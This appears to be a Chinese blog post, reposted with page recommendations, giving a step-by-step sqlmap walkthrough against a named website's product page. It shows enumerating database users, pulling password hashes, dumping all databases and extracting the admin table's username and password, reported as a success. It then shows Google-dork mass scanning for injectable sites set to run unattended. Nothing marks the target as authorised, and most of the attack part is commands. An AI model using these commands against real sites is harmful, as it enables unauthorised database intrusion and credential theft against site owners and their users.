SQLMAP使用

最新推荐文章于 2021-04-29 18:06:06 发布
最新推荐文章于 2021-04-29 18:06:06 发布
阅读量110 收藏
点赞数
原文链接:http://www.cnblogs.com/aventador/p/3285953.html
版权

 

1.sqlmap -u http://www.1234.net/product.asp?sid=53   获取基本信息,对注入点进行初步的判断和检测

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

已经判断出目标的系统和数据库类型。

2.sqlmap -u http://www.1234.net/product.asp?sid=53  --is-dba -v 1 判断数据库使用者是否DBA。

可以看出是DBA。

3. sqlmap -u http://www.1234.net/product.asp?sid=53  --users -v 0 列举数据库用户(是否SA)。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --passwords -v 0 获取数据库密码。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --privileges -v 0 判断当前权限。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --dbs -v 0       列出所有数据库。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --dump-all  -v 0 导出所有库。

kali上的sqlmap出错了,换BT5继续

4. ./sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --tables (--current-db) 获取当前数据库

中的表(-D 指定数据库)

得到4个表。

5../sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --columns -T admin -v 2  获取指定数据库(-D 指定数据库)

中指定表的字段

6.python sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --dump -T admin -C"username,password"   

获取指定数据库名中指定表中指定字段的数据

成功得到admin密码。

____________________________________________________________________________________________________________

摘抄:

1.如何高效率使用 google 搜索注入点:

 sudo python sqlmap.py -g inurl:php?id=13 --smart --threads=10 --batch 

稍作解释:
--smart 规定只是粗略判断是否可注入,而不详细检测(否则会慢死)
--batch 规定不与用户进行任何交互(这样你就可以一边看片片一边跑注入)
PS:说实话,sqlmap 用 google 搜注入点的功能真的不如啊 D,明小子

2.如何用 sqlmap 实现爬行页面搜索注入点
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --crawl=3
--crawl 指定爬行深度
3.模拟智能手机
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --mobile
4.盲注时智能预测表名字段名
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --predict-output

 

 

 

 

转载于:https://www.cnblogs.com/aventador/p/3285953.html

weixin_34380781
关注
sql注入学习(包括sqlilabs安装搭建注入环境步骤以及sqlmap安装操作说明链接地址)
莉莉安的博客
02-04 1万+
SQL注入: 就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 SQL注入可以分为平台层注入和代码注入。前者是由不安全的数据库配置或平台漏洞所致。后者是程序员对输入未进行细致过滤产生 sqlilabs搭建注入环境: Sqli-labs是...
sqlmap使用教程
热门推荐
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
linux进程suspended状态,为什么在一个终端上却显示“ Suspended(tty output)”(挂起(tty输出))?...
weixin_39768645的博客
04-29 2776
显然,我在tcshshell中做了一些奇怪/错误的事情,现在每当我在后台启动一个应用程序并打印输出到标准输出时,该应用程序就会被挂起(停止)。奇怪的是,此行为仅在此终端中发生;如果我在另一个终端上执行相同的操作,则该应用程序将继续在后台运行,并将其输出打印到终端。在“中断”终端中,我必须将挂起的应用程序放回前台(使用fg),以使其继续运行。例:thehost:/tmp/test1(277)>...
sqlmap使用
东方
09-11 103
https://blog.csdn.net/weixin_43571641/article/details/84146444
Sqlmap基础命令介绍及常用命令
_Ralph的博客
01-16 1万+
POST登录框注入: sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehas
sqlmap检测SQL注入及解决方案(Django)--超详细
pygodnet的博客
01-07 1086
一:场景、演示 场景:查询等拼接SQL和参数的问题,博主为了检测,这里写一个有注入风险的接口,请勿模仿 class PostMan(View): def get(self, request): aa = request.GET.get('aa') with connections['default'].cursor() as cursor: sql = 'select * from sys_dict where pid = %s'%(aa)
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
Sqlmap使用
weixin_34327223的博客
04-11 245
一、Sqlmap简介    sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 1.2 支持的数据库:    MySQL Oracle PostgreSQL Microsoft SQL Server, Microsoft ...
ASP.NET防止SqlMap注入示例
sinat_21813453的博客
11-23 1332
第一步:在Web.config中配置 &lt;appSettings&gt;     &lt;add key="safeParameters" value="OrderID-int32,CustomerEmail-email,ShippingZipcode-USzip" /&gt; &lt;/appSettings&gt;  第二步:在Global.asaxz中添加 protected vo...
sqlmap注入总结
weixin_34321753的博客
08-22 1471
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
Sqlmap通用参数
一米八多的瑞兹的博客
02-25 556
Sqlmap通用参数 1. Sqlmap设置盲注字符集 在基于布尔和基于时间的SQL盲注中,用户可以强制使用自定义字符集来加速数据检索过程。 例如,如果转储消息摘要值(例如SHA1),则使用–charset=“0123456789abcdef”,预期请求数量比正常运行少30%左右。 2. Sqlmap爬取URL sqlmap可以通过从目标位置开始收集链接(爬行)来收集潜在的脆弱链接。使用此选项,用户可以设置一个深度(到起始位置的距离),低于这个深度,sqlmap不会进入收集阶段,因为只要有新的链接要访问,
sqlmap的简单使用
weixin_42350229的博客
01-25 164
文章目录sqlmap安装linux下win三种注入判断方式基本get注入及返回目标基本信息cookie注入post注入 sqlmap sqlmap强大的注入工具, 跨平台, 使用python编写, 可以自定义tamper脚本 安装 linux下 sudo apt-get install sqlmap # 前提是已经有python的环境变量 运行sqlmap sqlmap -u url # 直接s...
向前维泰比算法Matlab代码.rar
10-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
#-ssm-033-mysql-校园二手交易系统-.zip
最新发布
10-09
现如今,校园二手交易系统是商业贸易中的一条非常重要的道路,可以把其从传统的实体模式中解放中来,网上购物可以为消费者提供巨大的便利。通过校园二手交易系统这个平台,可以使用户足不出户就可以了解现今的流行趋势和丰富的商品信息,为用户提供了极大的方便,校园二手交易系统的主要功能包含:商品类别管理、商品的信息管理、订单管理、用户的管理等。网站分为管理员、会员用户这二种用户平台。校园二手交易系统主要使用目前JSP中最流行的SSM框架和Eclipse编辑器、MYSQL数据库设计并实现的。实现了一个校园二手交易系统网站。能够让广大消费者体验到网上平台订餐的乐趣,为网上购物提供了一个管理高效的、决策科学化、安全有效的电子商务平台。 关键词:校园二手交易系统,SSM,Eclipse,商业贸易
MATLAB软件的汽车框定系统【GUI界面版本】.zip
10-09
数据库课程设计
用于开发和测试大脑情感唤醒特征(BAAS)的代码.rar
10-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
sqlmap 使用指令
09-22
下面是一些常用的 sqlmap 使用指令: 1. 扫描目标网站是否存在 SQL 注入漏洞: `python sqlmap.py -u <URL>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1` 2. 检测目标网站是否存在 SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值